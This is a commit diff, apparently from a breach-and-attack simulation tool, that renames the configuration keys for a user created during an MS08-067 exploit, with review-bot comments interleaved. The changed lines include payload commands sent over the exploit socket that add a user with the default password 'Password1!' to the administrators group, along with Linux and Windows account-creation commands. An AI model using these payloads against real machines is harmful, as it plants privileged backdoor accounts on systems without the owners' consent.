Rename ms08_067_remote_user_add and ms08_067_remote_user_pass to something more generic

Daniel Goldberg 2019-01-07 10:58:20 +02:00
parent 70545d28f8
commit 68093d084f
6 changed files with 18 additions and 18 deletions


@ -208,8 +208,8 @@ class Configuration(object):
skip_exploit_if_file_exist = False skip_exploit_if_file_exist = False
ms08_067_exploit_attempts = 5 ms08_067_exploit_attempts = 5
ms08_067_remote_user_add = "Monkey_IUSER_SUPPORT" user_to_add = "Monkey_IUSER_SUPPORT"
ms08_067_remote_user_pass = "Password1!" remote_user_pass = "Password1!"
# rdp exploiter # rdp exploiter
rdp_use_vbs_download = True rdp_use_vbs_download = True
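Review bot: The two new names no longer read as a pair: `user_to_add` drops the "remote" qualifier that `remote_user_pass` keeps, so the config alone does not make it obvious that the password belongs to that user. A matched pair such as `remote_user_name` / `remote_user_pass` would be clearer; the same applies to the JSON example config and the SCHEMA sections of this commit. Because these are configuration keys, a stored configuration that still carries the `ms08_067_remote_user_*` names will presumably stop being applied after the rename. No compatibility mapping is visible here, so it is worth confirming how old keys are handled.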


@ -57,8 +57,8 @@
"monkey_log_path_linux": "/tmp/user-1563", "monkey_log_path_linux": "/tmp/user-1563",
"send_log_to_server": true, "send_log_to_server": true,
"ms08_067_exploit_attempts": 5, "ms08_067_exploit_attempts": 5,
"ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT", "user_to_add": "Monkey_IUSER_SUPPORT",
"ms08_067_remote_user_pass": "Password1!", "remote_user_pass": "Password1!",
"ping_scan_timeout": 10000, "ping_scan_timeout": 10000,
"rdp_use_vbs_download": true, "rdp_use_vbs_download": true,
"smb_download_timeout": 300, "smb_download_timeout": 300,


@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
sock.send("cmd /c (net user %s %s /add) &&" sock.send("cmd /c (net user %s %s /add) &&"
" (net localgroup administrators %s /add)\r\n" % " (net localgroup administrators %s /add)\r\n" %
(self._config.ms08_067_remote_user_add, (self._config.user_to_add,
self._config.ms08_067_remote_user_pass, self._config.remote_user_pass,
self._config.ms08_067_remote_user_add)) self._config.user_to_add))
time.sleep(2) time.sleep(2)
reply = sock.recv(1000) reply = sock.recv(1000)
@ -213,8 +213,8 @@ class Ms08_067_Exploiter(HostExploiter):
remote_full_path = SmbTools.copy_file(self.host, remote_full_path = SmbTools.copy_file(self.host,
src_path, src_path,
self._config.dropper_target_path_win_32, self._config.dropper_target_path_win_32,
self._config.ms08_067_remote_user_add, self._config.user_to_add,
self._config.ms08_067_remote_user_pass) self._config.remote_user_pass)
if not remote_full_path: if not remote_full_path:
# try other passwords for administrator # try other passwords for administrator
@ -240,7 +240,7 @@ class Ms08_067_Exploiter(HostExploiter):
try: try:
sock.send("start %s\r\n" % (cmdline,)) sock.send("start %s\r\n" % (cmdline,))
sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,)) sock.send("net user %s /delete\r\n" % (self._config.user_to_add,))
except Exception as exc: except Exception as exc:
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc) LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
return False return False
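Review bot: In the last hunk the `net user %s /delete` cleanup shares a `try` with the `start %s` send, so if the first send raises, the account is never removed and the failure is only logged at debug level. The first hunk shows that account being added to the local administrators group with the configured password, whose default elsewhere in this commit is the fixed string `"Password1!"`. A missed cleanup therefore leaves a privileged account with a known credential on the tested machine. Sending the delete from a `finally:` block (or its own `try`) and reporting a failure with `LOG.warning` would make the leftover visible to the operator. The enclosing method starts and ends outside these hunks, so this is based only on the visible lines.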


@ -36,14 +36,14 @@ class BackdoorUser(object):
def add_user_linux(): def add_user_linux():
cmd_line = ['useradd', '-M', '--expiredate', cmd_line = ['useradd', '-M', '--expiredate',
datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER', datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
WormConfiguration.ms08_067_remote_user_add] WormConfiguration.user_to_add]
retval = subprocess.call(cmd_line) retval = subprocess.call(cmd_line)
return retval return retval
@staticmethod @staticmethod
def add_user_windows(): def add_user_windows():
cmd_line = ['net', 'user', WormConfiguration.ms08_067_remote_user_add, cmd_line = ['net', 'user', WormConfiguration.user_to_add,
WormConfiguration.ms08_067_remote_user_pass, WormConfiguration.remote_user_pass,
'/add', '/ACTIVE:NO'] '/add', '/ACTIVE:NO']
retval = subprocess.call(cmd_line) retval = subprocess.call(cmd_line)
return retval return retval


@ -36,7 +36,7 @@ class WindowsInfoCollector(InfoCollector):
""" """
LOG.debug("Running Windows collector") LOG.debug("Running Windows collector")
super(WindowsInfoCollector, self).get_info() super(WindowsInfoCollector, self).get_info()
self.get_wmi_info() #self.get_wmi_info()
self.get_installed_packages() self.get_installed_packages()
from infection_monkey.config import WormConfiguration from infection_monkey.config import WormConfiguration
if WormConfiguration.should_use_mimikatz: if WormConfiguration.should_use_mimikatz:
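Review bot: The call `self.get_wmi_info()` is commented out here, which is unrelated to the rename in the commit title and means the WMI step of the Windows collector no longer runs. It looks like a local debugging change committed by accident. If so, restore the line as `self.get_wmi_info()`. If it is intended, it belongs in its own commit with a stated reason, and the line should be removed rather than left as `#self.get_wmi_info()`. The method body continues outside the hunk.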


@ -701,14 +701,14 @@ SCHEMA = {
"default": 5, "default": 5,
"description": "Number of attempts to exploit using MS08_067" "description": "Number of attempts to exploit using MS08_067"
}, },
"ms08_067_remote_user_add": { "user_to_add": {
"title": "MS08_067 remote user", "title": "Remote user",
"type": "string", "type": "string",
"default": "Monkey_IUSER_SUPPORT", "default": "Monkey_IUSER_SUPPORT",
"description": "Username to add on successful exploit" "description": "Username to add on successful exploit"
}, },
"ms08_067_remote_user_pass": { "remote_user_pass": {
"title": "MS08_067 remote user password", "title": "Remote user password",
"type": "string", "type": "string",
"default": "Password1!", "default": "Password1!",
"description": "Password to use for created user" "description": "Password to use for created user"